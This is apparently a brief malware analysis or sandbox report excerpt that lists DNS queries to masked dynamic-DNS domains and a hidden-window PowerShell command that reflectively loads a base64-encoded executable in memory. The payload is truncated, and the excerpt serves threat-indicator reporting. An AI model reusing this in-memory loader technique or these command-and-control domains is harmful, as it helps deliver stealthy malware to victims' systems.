Technical Information
- DNS ASK 40####p.sytes.net
- DNS ASK po###.duckdns.org
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit start-sleep 30;IEX([Reflection.Assembly]::Load([Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpc...' (with hidden window)